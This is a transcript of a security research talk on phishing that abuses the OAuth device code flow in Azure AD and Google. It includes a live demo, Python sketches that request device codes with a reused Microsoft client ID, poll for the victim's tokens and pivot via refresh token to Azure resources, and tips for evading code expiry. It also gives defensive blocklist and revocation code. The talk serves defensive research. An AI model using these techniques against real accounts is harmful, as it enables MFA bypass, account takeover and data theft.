Hi, welcome. Today I'm going to be talking about new phishing attacks that exploit OAuth authorization flows. My name's Jenko Hwang. I'm currently a researcher at Netskope, and these are some of the areas I've dabbled in that are interesting to me from a research perspective. To set the stage, I'd like to spend a minute recapping the history of phishing, so that we can understand the latest evolution of techniques. In the beginning, phishing was predominantly carried over SMTP; this was probably the late 90s, when we started to see phishing. The attacker was very focused on fake domains: registering them, hosting websites, maybe obtaining SSL certificates as well to lend some validity to the fake site, and ultimately tricking the user into supplying their username and password. As mobile came along, with more apps and app protocols, phishing then targeted those applications. So we got SMS phishes (smishes), IMs, chats. For the most part a lot was the same, but because of the limited UX and screen real estate, things like URL shorteners, and the difficulty of checking the SSL certificate or even seeing the URL, created new challenges for the user as well as for any software security controls in the picture. With cloud infrastructure providers, attackers suddenly had an easier way to host their fake website. On top of that, the domains and the SSL certs now reflected those same popular cloud providers, so the victims as well as the security controls had more of a challenge detecting fake domains, phishes, certs, et cetera. So none of this is new; in this case, maybe the attacker is trying to create something like Citibank's website hosted in Azure. 
The controls I alluded to grew, for the most part, into a series of techniques. Up front: detection of phishes using various kinds of link analysis (domains, URLs, the certs themselves), checking sender reputation, and having threat intel that helps with all of that, so that an incoming phish could be blocked before reaching the user. After the user receives an actual phish, some of the same techniques might be used to prevent the user from actually connecting outbound over HTTP to the fake website. There might also be content inspection used to detect credentials within the payload: forms, fields, et cetera. Ultimately, if credentials were hijacked, a set of controls like MFA, plus policies governing which IP addresses could be used with credentials, were also applied. MFA especially was pretty effective at minimizing the impact of compromised credentials. So none of this is new; this has been roughly 10 or 20 years of phishing evolution, if I can simplify it that much. Now, what's changed over the last few years? Well, as OAuth (OAuth 2.0 was standardized around 2012) got more popular, driven a lot by security and by the interaction of all these websites and web apps, the part of OAuth that deals with authorization in a secure manner became very popular, and it has caused us to rethink both how to phish and how to defend against it. At a high level, if you're not that familiar, OAuth involves an application. This could be a website, or it could be a local application on the desktop or mobile, often referred to as the client or device. The application might request authorization from the user to do something: approve a payment, log in, and so on. And it redirects the user to the identity platform. Part of the OAuth model is to not have applications handle or store anything about the user's credentials, so there's a redirect. 
The user then authenticates as they would with their identity platform; when we're talking about OAuth here, it's really Azure AD or Google Identity. That authentication process can be very secure and include MFA. Ultimately the user is presented with some kind of authorization step: approve these permissions, approve this task. The permissions are called scopes in OAuth land. If everything goes well, OAuth session tokens are supplied back to the application. The application holds these access tokens, can generate new ones with the refresh token, and can use them to actually gain access to the user's resources or to perform a task, because it essentially has post-authentication status. As a user, this is familiar in various contexts. One is payments: you're shopping, you get to checkout, and PayPal, which is an OAuth provider, allows websites to easily accept payment with PayPal. If you click through as a user, the website redirects you to PayPal so that you can go through your authentication, with MFA. At that point you're dealing with PayPal directly, so the original website never sees, and has no chance to compromise, your credentials. As you complete the process with PayPal, you end up with their version of an authorization or consent screen: do you agree to pay the original website such-and-such an amount for whatever you're shopping for? There are other contexts too, even technical tools: CLIs in Google Cloud have a login process, of course. In this case it creates a URL that you can copy and paste into a browser, but it's actually an OAuth flow. In the browser, once you go to that URL, you're prompted to enter your username and password, and then you get a consent screen saying, hey, the CLI, which is really registered as the Google Cloud SDK, wants to access your Google account, and it's asking for these permissions. 
If you go ahead and hit allow, you've confirmed, you see some confirmation messages, and back on the command line you might see a final message that, hey, you're now logged in. So initially, phishing responded to this new authorization identity platform, OAuth, with similar techniques: here's a new login. Great, it's an OAuth login, but it's just another login, I'll spoof it. A lot of this was business as usual from the phishing side. However, we did see some evolution, where the code presenting the fake login would actually do a real-time validation check against the identity provider to validate the credential, and then, based on whether it was valid or not, take different actions to help maintain stealth. It might redirect to a valid domain's login screen or something else, depending, which might help prevent the user from raising a flag manually. It also provided an opportunity to validate credentials up front, so that check could happen right away instead of later. The controls, for the most part, have stayed the same, because the techniques really haven't changed much. So why do we care to delve into and research the protocol more deeply? So far this hasn't made much difference. Well, obviously I wouldn't be talking if that were the case. Here's why attackers have dug deeper, and why, from a research perspective, it's worth focusing on this. One: instead of targeting the username and password, we target the OAuth session tokens. There are some advantages there. The OAuth model essentially allows refreshing them, and the defaults pretty much allow you to do that forever. The session token gives you the same power as the original credential, with one added advantage: you don't have to re-challenge with MFA. 
If MFA is enabled, once the user goes through it manually, the tokens are effectively blessed, and the refresh token allows this unlimited ability to hold a long-duration credential. So getting access to session tokens effectively allows us to, quote, bypass MFA. The second reason is that all of this is REST-enabled, so hijacking the tokens does not require compromising an endpoint. We have these nice REST APIs, we have a complicated flow, and there's the ability to insert ourselves into the flow, or perhaps gain access to tokens remotely, which is huge, because tokens are not a new concept; they've been around since the beginning of the web. We've had web sessions, we've had session IDs kept in cookies or local storage, and we've had web attacks, like cross-site scripting, that exploited those sessions to hijack them. We've had endpoint compromises that also looked at grabbing or harvesting those tokens. However, there's a pretty high bar to take advantage of that, because you'd have to compromise the endpoint or pull off a browser attack. This is far, far easier, because we have REST APIs, and we'll see that in the upcoming deep dives. So there have been actual attacks. One of them is called the illicit consent grant attack, which has exploited the protocol. The illicit consent grant works by exploiting overly broad consents and privileges and tricking the user into approving them. The attacker creates their own application, a fake application, perhaps named close to an existing app. They register it in the identity platform, possibly under their own account. They ultimately send a phish to the user, requesting broad scopes to some resource. Imagine it's called Google Drive MySync, some name that seems plausible, and it asks the user to give this application read and write access to everything in Google Drive. 
If you get the user to click, they'll approve these bigger scopes, and OAuth tokens will be created and made accessible to the attacker, because the application that's part of the flow specifies how to retrieve those tokens: they actually get pushed through a redirect URL to the application. So from a victim's perspective, either the user has to identify or know that it's a fake application, or a security or IT administrator needs to be able to prevent users from clicking and approving these app requests. This has happened; there's a reference here from just the last year or so of illicit consent grant attacks. From the user's perspective, all they see in the consent screen is a list of permissions that might be wider or deeper than they expect. The controls against these are, as I mentioned, in the hands of the administrators running the organization: watching the network, preventing users from creating or registering fake apps in AD (which might prevent an insider attack), and preventing users from consenting and hitting accept. That changes the flow; users aren't actually presented with an Accept button, and the administrator is in control. I just wanted to point out that the Microsoft documentation has this nice 12-point numbered diagram. I did not add that; it's actually part of the documentation, and the points are explained pretty well there. Kudos to them. It's great as a researcher, but I have to say, as a user, it's extremely confusing to need 12 points to explain an OK dialog. This is where complexity is the enemy of security. So let's get to device code authorization, which is really the flow I want to focus on today. What's its purpose? Briefly: to provide usability, that is, easier authentication and authorization, on a limited-input device where you need some kind of authorization and authentication. 
The best example is a smart TV, where you need to authenticate against your content subscription so you can get your movies on the TV; they all have this menu these days. It could be a device like a Roku or Apple TV. The problem is, if you were to enter that credential on the actual device, you'd be typing it with a remote control, which is completely heinous. So there's an RFC to solve that: back in 2019, some smart people came up with a way to do it. When it's implemented, the application vendor, in this case the smart TV vendor, implements the device code flow, and now the user has a better experience. They're presented with a short URL and told to go to a different device, one with a real keyboard. There's a relatively short URL to punch in there, and a relatively short code to type in. Then they go through a normal authentication or login process to approve this TV gaining access to, in this case, their Netflix subscription. There's even a QR code capability, so that your mobile device can go to the URL directly. So that's all well and good: the user follows the URL, punches in that short code, and voila, everything's working. However, usability is one of the biggest drivers here, and I have a saying that usability is the father of insecurity. It drives less security, and that is our opportunity to exploit, because things get simplified, things get dropped, things get less secure, or things just aren't looked at from a security viewpoint. So let's look at device code authorization a little deeper. What really happens under the hood is this: a user is trying to log in or do some task; the device gets a user code and sends a URL along with that user code to the user, so that they can authenticate; and once they do, OAuth tokens are created, which are then accessible from the device. Okay, similar to what I said before. 
But to show how easy this is to abuse, or at least how difficult it is as a user to protect your credentials, I'd like to go through the demo now. Just a short note: Dr. Nestori Syynimaa has a great deal of information at his blog, o365blog.com, a super great resource. He has his tool set, AADInternals, with great material about Windows, Azure AD, Outlook, and Office, as well as OAuth. I highly recommend it. So let's jump into the demonstration. To set the stage: on the left side will be the browser of the victim, on the right side the terminal of the attacker, and we'll actually go through a device code flow and see the implications from both sides. In this case, we're logging into the standard URL for this company's Azure AD tenant, Feast Health, and we want to gain access first to Outlook. So we punch in username and password and get to two-factor; in this case, it's software-based. We punch in that code. Do you want to stay signed in? No. We go through it and boom, we're in Outlook. Now, meanwhile, the attacker is independently thinking about phishing. We'll start up a script, running in demo mode; this is part of the open-source software we are releasing concurrently. I want to point out a few things. One of the first steps we're doing as part of the phish is actually following the device code authorization flow: we're going to generate a code. If you look at the POST, we're specifying a set of APIs, the Graph APIs, as our resource, and we're actually using a client ID, the application client ID. When you create an application in the OAuth world, you get back an ID and a secret. We're actually reusing an existing one; we didn't have to create an app to carry out this phish. This is the Outlook client ID that we're reusing. When we execute this first step, we get back a user code that we're going to phish the user with, along with the login URL, called the verification URL. We'll explain the other fields as we go. Now I'm going to send out the phish. 
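That first step, generating a code by reusing an existing vendor client ID, can be sketched in a few lines. This is a sketch under assumptions: it uses Azure AD's v1 device code endpoint and the widely documented Microsoft Office client ID, and the field names are illustrative of what the demo script sends, not an excerpt from it.

```python
# Sketch of step one of the flow shown in the demo: requesting a device code.
# Assumptions: Azure AD's v1 device code endpoint and the widely documented
# Microsoft Office client ID. Note that no client secret is ever required.
import json
import urllib.parse
import urllib.request

DEVICE_CODE_URL = "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0"
OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"  # an existing vendor client ID

def build_device_code_request(client_id: str, resource: str) -> bytes:
    """Form-encode the only two fields the request needs: client ID and resource."""
    return urllib.parse.urlencode({"client_id": client_id, "resource": resource}).encode()

def request_device_code(resource: str = "https://graph.microsoft.com") -> dict:
    """POST to the device code endpoint; the response carries user_code,
    device_code, verification_url, expires_in, and the polling interval."""
    body = build_device_code_request(OFFICE_CLIENT_ID, resource)
    req = urllib.request.Request(DEVICE_CODE_URL, data=body)
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```

The `user_code` and `verification_url` from the response are what go into the phish; the `device_code` stays with the attacker for polling.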
And in a second, the phish will appear. I'm going to pause and just say that after the phish is sent out, part of the device code authorization flow is to poll the identity platform, in this case Azure, for the OAuth tokens that will be created after the user logs in. So it will sit there waiting. And in a second, there it is. On the left, we see a new email. Let's check it out. Ed has received an email from the Microsoft Office 365 product team. It is thanking Ed for being such a great customer; as part of that, he'll get one terabyte of extra storage and an increased attachment size of 100 megabytes. It's awesome. Ed can't resist, and he types in the code. Now, let me go back and point out something in the message. There's a real URL in here: it's microsoft.com, nothing shady or funny. It's an href link, but it actually points where the text says; it's part of the device code authorization. So we can see that some phish detection might fail right off the bat on domain alone, because it's microsoft.com. Okay. So Ed follows the link, punches in the code supplied in the phish, and what's happening? He's being prompted to authenticate. Since he had already logged into Outlook, it's cached in the browser; otherwise, he would type in his username and password and perhaps an MFA code. And then he gets to this stage. I want to point out the prompt: are you trying to sign in to Microsoft Office? "Microsoft Office" came from the client ID we used in our initial phishing step. We use the client ID, and we get that title. So there's a continue button, and that's it for the user: they entered the code, they authenticated, they're done. Meanwhile, the attacker script is polling, checking every five seconds; this is all part of the protocol for device code authorization. Now that the user is logged in, we should have OAuth tokens, and this will return in a few seconds with access tokens, session tokens. There it is. So let's note a few things. 
Number one, what's in the response: the scopes associated with the tokens. These are the permissions that we have access to with this token. The resource the tokens apply to is the Graph API. We have an access token, and we have a refresh token. Great. What can we do in the Graph API? You can see the indirection here: we put in an application, Microsoft Office, which is what the user thinks they've approved, but we've got access to the Graph API, which is a little broader than just Outlook. So one thing we can do is get all AD users with that access token, running as Ed, with his permissions. And there's a list of three users: Ed included, plus David and Sandra. Just to compare, we'll go to Ed's view, the victim's view, in the Azure portal. We'll actually go into Azure Active Directory and check out the users, just to convince ourselves this is real, matching data. It all matches. What else can we do? We can gain access to Ed's email. So we just made a call with that same access token and got three emails: the thank-you from the 365 team, and some Social Security and credit card numbers. All looks great. Switch to Outlook as Ed, and you can see the same emails in the inbox, in the nav pane on the left. So this is great: through the Graph API, we have access to Ed's email. But to make it interesting, we want to show that you can actually pivot, move laterally, and trade in, or rather use, the refresh token we have to gain a different access token with different scopes, different implicit scopes. So let's do one that gets at all of Azure, all of the Azure resources. What do we do here? We use the refresh token that we got under the guise of Microsoft Office against the Graph API, and we use that refresh token to get a new access token that has access to the resources in Azure. We're still using the Outlook client ID, and this time we have to specify a scope; before we didn't, and we got back a bunch of scope permissions. 
Here we're using openid, which is a pretty basic scope: username, email, basic profile information. And what we got back is interesting. The resource is Azure, and that's fine, but look at the scope: it changed, which is part of the protocol. It comes back with what you really have access to. We asked for openid; we got back user_impersonation. User impersonation means we can do everything the user can within this resource area of Azure, and this user happens to be a global administrator. We have hit gold. We got a new access token, and it has that scope privilege for this resource, and we didn't have to supply anything special; I want to point out, no secrets. So what can we do with that? Let's enumerate all resources in Azure, at least in the subscription the user is part of. Okay, long list. Let's go back to the beginning and take a look. First, we listed the subscriptions this user has access to with this token. Just to convince ourselves, we go to Ed's view in the portal and look at subscriptions: it is in fact Azure subscription 1. Great. There are a bunch of resources in that subscription, so let's look at all resources and compare with what we retrieved, just to convince ourselves we're looking at real data: disks and compute, virtual machines, their SSH keys. There's a storage account for data, sajeh1, listed right there, and that storage account has a container, scjeh1. Drilling into that container: our two files, ss1.txt and ss3.txt. And in fact, there is the container, and there are ss1 and ss3. So everything matches up, and we've just enumerated everything. And since Ed's a global administrator, we could do pretty much anything within the whole AD as well as the subscription. So that's the end of the phish, and the super interesting part, from this view, is the pivot, along with what we never had to supply. 
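The post-phish calls from the demo can be sketched roughly as follows, assuming Azure AD's v1 token endpoint plus the public Graph and Azure Resource Manager APIs; treat the exact field names and API versions as illustrative rather than an excerpt from the demo tooling.

```python
# Rough sketch of the demo's post-phish calls: querying Graph with the stolen
# access token, then pivoting by exchanging the refresh token for an Azure
# Resource Manager token. Endpoints and API versions are illustrative.
import json
import urllib.parse
import urllib.request

TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"

def api_get(url: str, access_token: str) -> dict:
    """GET any REST API with a bearer token; no other secret is involved."""
    req = urllib.request.Request(url, headers={"Authorization": f"Bearer {access_token}"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)

def build_pivot_request(client_id: str, refresh_token: str, resource: str) -> bytes:
    """Form-encode the refresh-token grant that pivots to a new resource.
    We only ask for openid; the scope that comes back (user_impersonation
    in the demo) is decided by the identity platform."""
    return urllib.parse.urlencode({
        "grant_type": "refresh_token",
        "client_id": client_id,          # still the reused vendor client ID
        "refresh_token": refresh_token,
        "resource": resource,            # e.g. https://management.azure.com/
        "scope": "openid",
    }).encode()

def pivot(client_id: str, refresh_token: str, resource: str) -> dict:
    body = build_pivot_request(client_id, refresh_token, resource)
    with urllib.request.urlopen(urllib.request.Request(TOKEN_URL, data=body)) as resp:
        return json.load(resp)

# With tokens in hand, the demo's queries are plain GETs:
#   api_get("https://graph.microsoft.com/v1.0/users", graph_token)        # all AD users
#   api_get("https://graph.microsoft.com/v1.0/me/messages", graph_token)  # Ed's mail
#   api_get("https://management.azure.com/subscriptions?api-version=2020-01-01", arm_token)
```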
We did not need to supply any secrets along the way. It was really easy. Let's switch back and look at device code authorization in a bit more detail, going back to the protocol itself, and figure out how we abused it to carry out that demo. Let me highlight a few things about turning this into a phish. We pretty much use the standard device code authorization flow, but of course there is no initial login or task by the user. Normally, as in the smart TV example, the user is explicitly trying to hook up a streaming service and authenticate to it, so the user expects to be part of this flow. Here the attacker's in control, and the user is sitting there minding their own business. As the attacker, we start by generating a user code. I want to point out that this is a real snippet of all the key attributes in the REST API call to generate a code, and it's a standard URL. I supply a client ID, which we've seen can be spoofed, or rather can simply be an existing client ID, including the vendor's own; in this case it's Outlook's. I don't need to supply a secret here, and I can specify a resource, whether it's the Graph API or Outlook.com. And I immediately get back the information I need to start my phish: a device code, which I'll use later; a user code, which I'll give to the user; the login URL; and an expiration time. I give that to the user in my phish. Step number four is the key one: if the user is convinced, they go and authenticate, enter the code, and go through authentication, including MFA. Once they're done, the device, which has been polling the identity platform in the background, is notified that the user finished logging in successfully, at which point OAuth tokens are created and returned as part of that polling API call. Look at all the stuff the application, the device, has done: no secrets required. 
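The background polling described above can be sketched as follows. It assumes Azure AD's v1 token endpoint and the standard device_code grant type; the error strings follow the documented device code grant, but treat the exact shapes as illustrative.

```python
# Sketch of the device-side polling loop: ask the token endpoint every
# `interval` seconds whether the user has finished logging in.
import json
import time
import urllib.error
import urllib.parse
import urllib.request

TOKEN_URL = "https://login.microsoftonline.com/common/oauth2/token"

def build_poll_request(client_id: str, device_code: str) -> bytes:
    """Form-encode the polling call; AAD's v1 endpoint takes the device
    code in a field named 'code'. Still no secret anywhere."""
    return urllib.parse.urlencode({
        "grant_type": "urn:ietf:params:oauth:grant-type:device_code",
        "client_id": client_id,
        "code": device_code,
    }).encode()

def poll_for_tokens(client_id: str, device_code: str,
                    interval: int = 5, timeout: int = 900) -> dict:
    body = build_poll_request(client_id, device_code)
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            req = urllib.request.Request(TOKEN_URL, data=body)
            with urllib.request.urlopen(req) as resp:
                return json.load(resp)  # access_token, refresh_token, scope, resource
        except urllib.error.HTTPError as err:
            if json.load(err).get("error") != "authorization_pending":
                raise  # slow_down, expired_token, access_denied, etc.
        time.sleep(interval)  # the recommended interval comes back in step one
    raise TimeoutError("user code expired before the user authenticated")
```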
It's all public information. In fact, client IDs are for the most part easily determined for local clients, and they're also logged, so it's really easy in the Microsoft arena to identify client IDs. No secrets are needed. So you can see that this is a little disturbing, because if you squint, step back, and ignore the details, we now have a process where I just need to convince the user to type a code into a standard Microsoft or Google URL. Just to note: I know I've mixed and matched Google URLs with Microsoft ones here; in all cases this is very real and common, and all of these attributes are similar across both. What I was saying is that to carry out this phish, if you step back from it all, all you need to do is convince the user to go to a particular URL, enter a code, and authenticate. The OAuth tokens will be created and stored by the identity platform, and you can go retrieve them. That's a little bit crazy, right? You don't have to create your own infrastructure to do this: no login page of your own, no application of your own. You just point the user at the identity platform, give them a code, and then you have your tokens. Once you have the access tokens, the pivot, from a Microsoft perspective, looks like this: you make a refresh-token call and get back a fresh set of tokens, and here's where you can see the scope change. We pointed this out during the demo; it's repeated here just to show it. So to summarize some of the key points, what's common not just to Microsoft but across OAuth vendors is a device code authorization with three aspects or qualities. You don't need server infrastructure. You don't need to register your own OAuth application; in fact, you can use an existing one, even the vendor's own client application. And the user does not see a consent screen or a list of permissions; they're not prompted for that. They're prompted with a somewhat obscured "do you want to sign in to this application?", but that's it. 
Do you want to grant the application access to everything in your email, all users in AD, and your Azure resources, as well as other services? They don't see that. Second, Microsoft has a notion of implicit or default scopes: in step two, the application that starts this whole process never supplies a scope. Google is a bit different; there you do supply a scope. It just means the scopes you ultimately get with the OAuth tokens are things you never had to request, and we end up getting the user_impersonation scope in Microsoft, which allows us to do anything the user can do. Third, Microsoft allows this lateral move to other services, or resources I should say, as that user, by refreshing a token for a different resource and getting that back. Logging is limited. What is logged: when the attacker actually retrieves the OAuth tokens, their IP address is logged, and it shows up as an actual authentication in the Azure sign-in logs for this user. But this is limited, because the lateral move is not logged; the lateral move being when we refreshed the token to get an Azure access token, and that was not logged. So, partial information. Here are some of the details in that log entry. We can see that the application ID is shown, but not much else. We know what user is operating here: the attacker did this retrieval of OAuth tokens for Ed, but it just looks like an action by Ed. Nothing identifies the attacker other than the IP address, as in the prior view, and that can easily be obfuscated through a proxy or VPN. So, what can reasonably be done to protect against this, and what would be encountered? Probably the most effective control would be blocking the verification URLs, that is, the sign-in URLs that start this whole process off with the user. There's a standard one for Google; Microsoft has a couple, because one redirects to the next. So you could block those URIs; the security team could. 
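As a sketch of what that blocking might look like, here is a small outbound-URL check. The listed URLs are the commonly cited device-flow verification pages for Microsoft and Google; a real deployment should verify the current set, including any redirecting aliases, against vendor documentation.

```python
# Sketch of a proxy-side check against device-flow verification URLs.
# The URL list is an assumption based on commonly documented endpoints.
from urllib.parse import urlparse

DEVICE_VERIFICATION_URLS = {
    ("microsoft.com", "/devicelogin"),                          # redirects onward
    ("login.microsoftonline.com", "/common/oauth2/deviceauth"),
    ("www.google.com", "/device"),
}

# Normalize the blocklist once: drop a leading "www." so both forms match.
_NORMALIZED = {(h.removeprefix("www."), p) for h, p in DEVICE_VERIFICATION_URLS}

def is_device_verification_url(url: str) -> bool:
    """True if an outbound request targets a device-flow sign-in page."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").removeprefix("www.")
    path = parsed.path.rstrip("/")
    return (host, path) in _NORMALIZED
```

A security team would wire a check like this into a forward proxy or secure web gateway, while allowing exceptions for legitimate device-flow users such as CLI tools.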
But it's an imperfect solution, because you might actually need to allow it for some valid logins. What's an example of that? Not a smart TV, which could probably be blocked as against policy, but the Azure CLI does device code authorization; at least it has one flow where it does verbatim device code authorization. So you have to be careful about what breaks if you're on the defensive side, and it just means there are cases where the prevention is imperfect or can't be put in place. There are also recommendations to block access or use of tokens based on IP, location, or endpoint, and if that's within your control, that's a possibility. But IP allow lists are often a challenge, as are geolocation and other characteristics. So prevention is best described as imperfect, but possible. Detection is difficult, because logging of anything related to OAuth tokens, these temporary session tokens, is very limited. Remediation does exist: once you do know there's a problem with a user, you can revoke all their OAuth tokens in Microsoft's world. In Google that is more obscure; you can do it, but it's not as obvious as a straight API call. There are some practical considerations to keep in mind. The main one is that the user code, once generated, is temporary: it will typically expire after 15 or 30 minutes, and the expiration is in the response to the REST API call. It just means the attacker can, in response, play a phishing numbers game, that is, ignore the constraint and just blast out to a large number of users at a certain time in order to get some of them to respond. If going over email, email has its advantages in that the phish can be rich; it can sell a story. However, the timing may result in a low response rate to the phish. So, practically speaking, you could choose other forms of communication, including chat or SMS, which might create a more instant response because of how those applications are actually used in everyday interactions. 
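Going back to the remediation point for a moment: on the Microsoft side, the revocation mentioned above can be done through the Microsoft Graph `revokeSignInSessions` action, which invalidates a user's refresh tokens. A minimal sketch, assuming the caller already holds an appropriately privileged Graph token:

```python
# Sketch of remediation via Microsoft Graph: revokeSignInSessions invalidates
# the user's refresh tokens, forcing re-authentication. Assumes an admin
# token with the appropriate Graph permission is already in hand.
import urllib.request

def build_revoke_request(user_id: str, admin_token: str) -> urllib.request.Request:
    """Build the POST that revokes all of one user's sign-in sessions."""
    url = f"https://graph.microsoft.com/v1.0/users/{user_id}/revokeSignInSessions"
    return urllib.request.Request(
        url,
        method="POST",
        headers={"Authorization": f"Bearer {admin_token}", "Content-Length": "0"},
    )

def revoke_sessions(user_id: str, admin_token: str) -> None:
    # Note: access tokens already issued stay valid until they expire
    # (typically on the order of an hour); this cuts off the refresh tokens.
    urllib.request.urlopen(build_revoke_request(user_id, admin_token))
```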
So there are ways around this temporary time frame. You could also fall back and actually create some infrastructure: host your own website, and instead of supplying a code in the phish itself, point the user to the fake hosted website, which generates a code on demand. Sites that hand out discount codes work that way today, so it's probably reasonable that someone would fall for it. You could even have images dynamically generated that show codes; images are suggested because JavaScript is out in actual mail clients. The images might be blocked by default, but the user always has the option to load them, and that could dynamically generate a code at that point in time, giving a fresh 15 minutes for the user to act. I point that out mainly because the expiring code is the one area that, from a practical implementation viewpoint, would need to be accommodated. So, some comparisons between OAuth providers; in this case I took the two major ones, Microsoft and Google. The main difference is that there's more exposure on the Microsoft side, because the handling of scopes is implicit and default, and you can get quite a lot of permissions without even asking for them, whereas Google has really tightened up the scopes you get from device code authorization. Meaning the access tokens can access the user profile, have limited Google Drive access, mainly to files the app itself created, and some YouTube and profile info. Because of that, the lateral movement is very different. On the Microsoft side it was easy, as we saw in the demo, to switch among a large number of services, whereas in Google it's pretty limited and strict: you get what you get with the initial scope. All in all, this drives toward mentioning some ongoing research areas. The problem with OAuth is not that it's got flaws or isn't secure; the problem is more that it's complicated. 
We talked about the normal OAuth flow, with the payments and CLI login examples. We did a demo of how one other flow, device code authorization, can be easily exploited. There are three more flows that aren't quite as obvious as device code authorization in terms of exposure, but are certainly interesting areas to research, because some of them have usability-type requirements. Like implicit grants, where things like consent can be bypassed because there's a way to get access tokens silently in the background. The default scopes in Microsoft's implementation are another area to delve into further, just to see how those scopes are specified and returned, because there may be things to explore there. On consent: there is a model for incremental consent, so that an application can ask the user for certain permissions one at a time, as needed. But then it gets into dynamic user consent, and some of the language hints that the behavior isn't quite as straightforward as you might think, and complexity breeds opportunities for exploitation. The last area is particularly interesting: browsers today offer usability features where you log into one application, say you're in Chrome and you log into Gmail, then you open a tab in that same browser and put in a URL for Google Drive. You don't have to reauthenticate to Drive, even though it's a separate app, and you're not even presented with a consent screen for either application. So browsers today, for usability, already provide this kind of auto-login and scope expansion, a sense of switching scopes that doesn't involve users explicitly entering credentials every time and re-approving scopes and permissions. What does that mean? It just means usability might have shortcut some parts of the protocol, because it is OAuth underneath. 
And it's not all hypothetical: back in 2013, with certain Chromium or Chrome browsers, there was an opportunity where you could trade in a token and get back more of a super or uber token that could access a lot of information across apps, without having gone through any reauthentication. Anyway, long story short, it's a very interesting area, and beyond this list, the more important takeaway is that we have a complicated authorization protocol. We have differences in implementation, as we've seen: Microsoft has a few quirks, Google has some different ones, and that results in different behavior. It's ubiquitous; it is as much a standard as anything on the internet. You can't avoid it, everyone's using it, and it's distributed by nature over a large network with REST APIs. So this is a particularly interesting area for us to keep an eye on in terms of security risks and opportunities. So thank you, that is the end of the talk. We didn't cover them in detail, but there are open-source tools that you can use to run the demo, do self-phishing, and explore what permissions are available once you do get responses to phishes. Finally, there is a list of references, which is in the initial presentation but repeated here as well. So thank you for your time, and if there's time for questions, we'll take them now.